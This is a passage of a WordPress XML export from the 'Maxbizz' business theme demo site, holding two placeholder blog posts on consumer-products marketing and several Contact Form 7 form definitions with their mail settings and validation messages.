		<wp:meta_value><![CDATA[438]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_gallery]]></wp:meta_key>
		<wp:meta_value><![CDATA[439]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_gallery]]></wp:meta_key>
		<wp:meta_value><![CDATA[440]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Crowdfunding. How to Get Funding Online?</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/crowdfunding-how-to-get-funding-online/</link>
		<pubDate>Sun, 04 Mar 2018 09:07:57 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=444</guid>
		<description></description>
		<content:encoded><![CDATA[<span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #4b83fc">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.

<span style="color: #1b1d21;font-weight: 600">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em>

<img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350" />
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21;font-weight: 600">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.
<blockquote>
<p style="text-align: center;line-height: 36px">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”
<cite>DAVID OSWALD</cite></p>
</blockquote>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.

<em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em>]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>444</wp:post_id>
		<wp:post_date><![CDATA[2018-03-04 09:07:57]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2018-03-04 09:07:57]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[crowdfunding-how-to-get-funding-online]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="category" nicename="business"><![CDATA[business]]></category>
		<category domain="category" nicename="consulting"><![CDATA[consulting]]></category>
		<category domain="post_tag" nicename="consulting"><![CDATA[consulting]]></category>
		<category domain="post_tag" nicename="marketing"><![CDATA[marketing]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Contactless Payments’ Time Has Come</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/contactless-payments-time-has-come/</link>
		<pubDate>Fri, 04 Sep 2020 09:09:22 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=447</guid>
		<description></description>
		<content:encoded><![CDATA[<span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #4b83fc">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.

<span style="color: #1b1d21;font-weight: 600">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em>

<img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350" />
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21;font-weight: 600">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.
<blockquote>
<p style="text-align: center;line-height: 36px">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”
<cite>DAVID OSWALD</cite></p>
</blockquote>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.

<em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em>]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>447</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:09:22]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:09:22]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[contactless-payments-time-has-come]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="category" nicename="business"><![CDATA[business]]></category>
		<category domain="post_tag" nicename="business"><![CDATA[business]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[448]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Coming Soon Form</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/?post_type=wpcf7_contact_form&#038;p=610</link>
		<pubDate>Wed, 09 Sep 2020 03:52:45 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=wpcf7_contact_form&#038;p=610</guid>
		<description></description>
		<content:encoded><![CDATA[<div class="cs-form flex-middle">
[email* your-email placeholder "Your Email *"]<button class="octf-btn">Sign Up</button>
</div>
1
Maxbizz "[your-subject]"
Maxbizz 
support@oceanthemes.net
From: [your-name] 
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: [your-email]




Maxbizz "[your-subject]"
Maxbizz 
[your-email]
Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: support@oceanthemes.net



Thank you for your message. It has been sent.
There was an error trying to send your message. Please try again later.
One or more fields have an error. Please check and try again.
There was an error trying to send your message. Please try again later.
You must accept the terms and conditions before sending your message.
The field is required.
The field is too long.
The field is too short.
The date format is incorrect.
The date is before the earliest one allowed.
The date is after the latest one allowed.
There was an unknown error uploading the file.
You are not allowed to upload files of this type.
The file is too big.
There was an error uploading the file.
The number format is invalid.
The number is smaller than the minimum allowed.
The number is larger than the maximum allowed.
The answer to the quiz is incorrect.
The e-mail address entered is invalid.
The URL is invalid.
The telephone number is invalid.]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>610</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 03:52:45]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 03:52:45]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[coming-soon-form]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[wpcf7_contact_form]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_form]]></wp:meta_key>
		<wp:meta_value><![CDATA[<div class="cs-form flex-middle">
[email* your-email placeholder "Your Email *"]<button class="octf-btn">Sign Up</button>
</div>]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:1;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:23:"support@oceanthemes.net";s:4:"body";s:179:"From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:22:"Reply-To: [your-email]";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail_2]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:0;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:12:"[your-email]";s:4:"body";s:121:"Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:33:"Reply-To: support@oceanthemes.net";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_messages]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:22:{s:12:"mail_sent_ok";s:45:"Thank you for your message. It has been sent.";s:12:"mail_sent_ng";s:71:"There was an error trying to send your message. Please try again later.";s:16:"validation_error";s:61:"One or more fields have an error. Please check and try again.";s:4:"spam";s:71:"There was an error trying to send your message. Please try again later.";s:12:"accept_terms";s:69:"You must accept the terms and conditions before sending your message.";s:16:"invalid_required";s:22:"The field is required.";s:16:"invalid_too_long";s:22:"The field is too long.";s:17:"invalid_too_short";s:23:"The field is too short.";s:12:"invalid_date";s:29:"The date format is incorrect.";s:14:"date_too_early";s:44:"The date is before the earliest one allowed.";s:13:"date_too_late";s:41:"The date is after the latest one allowed.";s:13:"upload_failed";s:46:"There was an unknown error uploading the file.";s:24:"upload_file_type_invalid";s:49:"You are not allowed to upload files of this type.";s:21:"upload_file_too_large";s:20:"The file is too big.";s:23:"upload_failed_php_error";s:38:"There was an error uploading the file.";s:14:"invalid_number";s:29:"The number format is invalid.";s:16:"number_too_small";s:47:"The number is smaller than the minimum allowed.";s:16:"number_too_large";s:46:"The number is larger than the maximum allowed.";s:23:"quiz_answer_not_correct";s:36:"The answer to the quiz is incorrect.";s:13:"invalid_email";s:38:"The e-mail address entered is invalid.";s:11:"invalid_url";s:19:"The URL is invalid.";s:11:"invalid_tel";s:32:"The telephone number is invalid.";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_additional_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_locale]]></wp:meta_key>
		<wp:meta_value><![CDATA[en_US]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Single Team Form</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/?post_type=wpcf7_contact_form&#038;p=736</link>
		<pubDate>Thu, 10 Sep 2020 08:20:11 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=wpcf7_contact_form&#038;p=736</guid>
		<description></description>
		<content:encoded><![CDATA[<div class="main-form">
<h4>Contact Me</h4>
<div class="row">
<p class="col-md-6">[text* your-name placeholder "Your Name *"]</p>
<p class="col-md-6">[email* your-email placeholder "Your Email *"]</p>
</div>
<p>[text your-site placeholder "Website"]</p>
<p>[textarea your-message placeholder "Message..."]</p>
<button type="submit" class="octf-btn">Send a message</button>
</div>
1
Maxbizz "[your-subject]"
Maxbizz 
support@oceanthemes.net
From: [your-name] 
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: [your-email]




Maxbizz "[your-subject]"
Maxbizz 
[your-email]
Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: support@oceanthemes.net



Thank you for your message. It has been sent.
There was an error trying to send your message. Please try again later.
One or more fields have an error. Please check and try again.
There was an error trying to send your message. Please try again later.
You must accept the terms and conditions before sending your message.
The field is required.
The field is too long.
The field is too short.
The date format is incorrect.
The date is before the earliest one allowed.
The date is after the latest one allowed.
There was an unknown error uploading the file.
You are not allowed to upload files of this type.
The file is too big.
There was an error uploading the file.
The number format is invalid.
The number is smaller than the minimum allowed.
The number is larger than the maximum allowed.
The answer to the quiz is incorrect.
The e-mail address entered is invalid.
The URL is invalid.
The telephone number is invalid.]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>736</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 08:20:11]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 08:20:11]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[single-team-form]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[wpcf7_contact_form]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_form]]></wp:meta_key>
		<wp:meta_value><![CDATA[<div class="main-form">
<h4>Contact Me</h4>
<div class="row">
<p class="col-md-6">[text* your-name placeholder "Your Name *"]</p>
<p class="col-md-6">[email* your-email placeholder "Your Email *"]</p>
</div>
<p>[text your-site placeholder "Website"]</p>
<p>[textarea your-message placeholder "Message..."]</p>
<button type="submit" class="octf-btn">Send a message</button>
</div>]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:1;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:23:"support@oceanthemes.net";s:4:"body";s:179:"From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:22:"Reply-To: [your-email]";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail_2]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:0;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:12:"[your-email]";s:4:"body";s:121:"Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:33:"Reply-To: support@oceanthemes.net";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_messages]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:22:{s:12:"mail_sent_ok";s:45:"Thank you for your message. It has been sent.";s:12:"mail_sent_ng";s:71:"There was an error trying to send your message. Please try again later.";s:16:"validation_error";s:61:"One or more fields have an error. Please check and try again.";s:4:"spam";s:71:"There was an error trying to send your message. Please try again later.";s:12:"accept_terms";s:69:"You must accept the terms and conditions before sending your message.";s:16:"invalid_required";s:22:"The field is required.";s:16:"invalid_too_long";s:22:"The field is too long.";s:17:"invalid_too_short";s:23:"The field is too short.";s:12:"invalid_date";s:29:"The date format is incorrect.";s:14:"date_too_early";s:44:"The date is before the earliest one allowed.";s:13:"date_too_late";s:41:"The date is after the latest one allowed.";s:13:"upload_failed";s:46:"There was an unknown error uploading the file.";s:24:"upload_file_type_invalid";s:49:"You are not allowed to upload files of this type.";s:21:"upload_file_too_large";s:20:"The file is too big.";s:23:"upload_failed_php_error";s:38:"There was an error uploading the file.";s:14:"invalid_number";s:29:"The number format is invalid.";s:16:"number_too_small";s:47:"The number is smaller than the minimum allowed.";s:16:"number_too_large";s:46:"The number is larger than the maximum allowed.";s:23:"quiz_answer_not_correct";s:36:"The answer to the quiz is incorrect.";s:13:"invalid_email";s:38:"The e-mail address entered is invalid.";s:11:"invalid_url";s:19:"The URL is invalid.";s:11:"invalid_tel";s:32:"The telephone number is invalid.";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_additional_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_locale]]></wp:meta_key>
		<wp:meta_value><![CDATA[en_US]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Subscribe Form</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/?post_type=wpcf7_contact_form&#038;p=741</link>
		<pubDate>Thu, 10 Sep 2020 08:29:17 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=wpcf7_contact_form&#038;p=741</guid>
		<description></description>
		<content:encoded><![CDATA[<div class="team-form flex-middle">
[text* your-name placeholder "Your Name *"]
[email* your-email placeholder "Your Email *"]
<button type="submit" class="octf-btn">Subscribe Now</button>
</div>
1
Maxbizz "[your-subject]"
Maxbizz 
support@oceanthemes.net
From: [your-name] 
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: [your-email]




Maxbizz "[your-subject]"
Maxbizz 
[your-email]
Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: support@oceanthemes.net



Thank you for your message. It has been sent.
There was an error trying to send your message. Please try again later.
One or more fields have an error. Please check and try again.
There was an error trying to send your message. Please try again later.
You must accept the terms and conditions before sending your message.
The field is required.
The field is too long.
The field is too short.
The date format is incorrect.
The date is before the earliest one allowed.
The date is after the latest one allowed.
There was an unknown error uploading the file.
You are not allowed to upload files of this type.
The file is too big.
There was an error uploading the file.
The number format is invalid.
The number is smaller than the minimum allowed.
The number is larger than the maximum allowed.
The answer to the quiz is incorrect.
The e-mail address entered is invalid.
The URL is invalid.
The telephone number is invalid.]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>741</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 08:29:17]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 08:29:17]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-team-form]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[wpcf7_contact_form]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_form]]></wp:meta_key>
		<wp:meta_value><![CDATA[<div class="team-form flex-middle">
[text* your-name placeholder "Your Name *"]
[email* your-email placeholder "Your Email *"]
<button type="submit" class="octf-btn">Subscribe Now</button>
</div>]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:1;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:23:"support@oceanthemes.net";s:4:"body";s:179:"From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:22:"Reply-To: [your-email]";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail_2]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:0;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:12:"[your-email]";s:4:"body";s:121:"Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:33:"Reply-To: support@oceanthemes.net";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_messages]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:22:{s:12:"mail_sent_ok";s:45:"Thank you for your message. It has been sent.";s:12:"mail_sent_ng";s:71:"There was an error trying to send your message. Please try again later.";s:16:"validation_error";s:61:"One or more fields have an error. Please check and try again.";s:4:"spam";s:71:"There was an error trying to send your message. Please try again later.";s:12:"accept_terms";s:69:"You must accept the terms and conditions before sending your message.";s:16:"invalid_required";s:22:"The field is required.";s:16:"invalid_too_long";s:22:"The field is too long.";s:17:"invalid_too_short";s:23:"The field is too short.";s:12:"invalid_date";s:29:"The date format is incorrect.";s:14:"date_too_early";s:44:"The date is before the earliest one allowed.";s:13:"date_too_late";s:41:"The date is after the latest one allowed.";s:13:"upload_failed";s:46:"There was an unknown error uploading the file.";s:24:"upload_file_type_invalid";s:49:"You are not allowed to upload files of this type.";s:21:"upload_file_too_large";s:20:"The file is too big.";s:23:"upload_failed_php_error";s:38:"There was an error uploading the file.";s:14:"invalid_number";s:29:"The number format is invalid.";s:16:"number_too_small";s:47:"The number is smaller than the minimum allowed.";s:16:"number_too_large";s:46:"The number is larger than the maximum allowed.";s:23:"quiz_answer_not_correct";s:36:"The answer to the quiz is incorrect.";s:13:"invalid_email";s:38:"The e-mail address entered is invalid.";s:11:"invalid_url";s:19:"The URL is invalid.";s:11:"invalid_tel";s:32:"The telephone number is invalid.";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_additional_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_locale]]></wp:meta_key>
		<wp:meta_value><![CDATA[en_US]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Main Contact</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/?post_type=wpcf7_contact_form&#038;p=1319</link>
		<pubDate>Thu, 03 Sep 2020 08:30:12 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=wpcf7_contact_form&#038;p=4</guid>
		<description></description>
		<content:encoded><![CDATA[<div class="main-form">
<h4>Ready to Get Started?</h4>
<div class="row">
<p class="col-md-6">[text* your-name placeholder "Your Name *"]</p>
<p class="col-md-6">[email* your-email placeholder "Your Email *"]</p>
</div>
<p>[text your-site placeholder "Website"]</p>
<p>[textarea your-message placeholder "Message..."]</p>
<button type="submit" class="octf-btn">Send Message</button>
</div>
1
Maxbizz "[your-subject]"
Maxbizz 
support@oceanthemes.net
From: [your-name] 
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: [your-email]




Maxbizz "[your-subject]"
Maxbizz 
[your-email]
Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: support@oceanthemes.net



Thank you for your message. It has been sent.
There was an error trying to send your message. Please try again later.
One or more fields have an error. Please check and try again.
There was an error trying to send your message. Please try again later.
You must accept the terms and conditions before sending your message.
The field is required.
The field is too long.
The field is too short.
The date format is incorrect.
The date is before the earliest one allowed.
The date is after the latest one allowed.
There was an unknown error uploading the file.
You are not allowed to upload files of this type.
The file is too big.
There was an error uploading the file.
The number format is invalid.
The number is smaller than the minimum allowed.
The number is larger than the maximum allowed.
The answer to the quiz is incorrect.
The e-mail address entered is invalid.
The URL is invalid.
The telephone number is invalid.]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1319</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 08:30:12]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 08:30:12]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[contact-form-1-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[wpcf7_contact_form]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
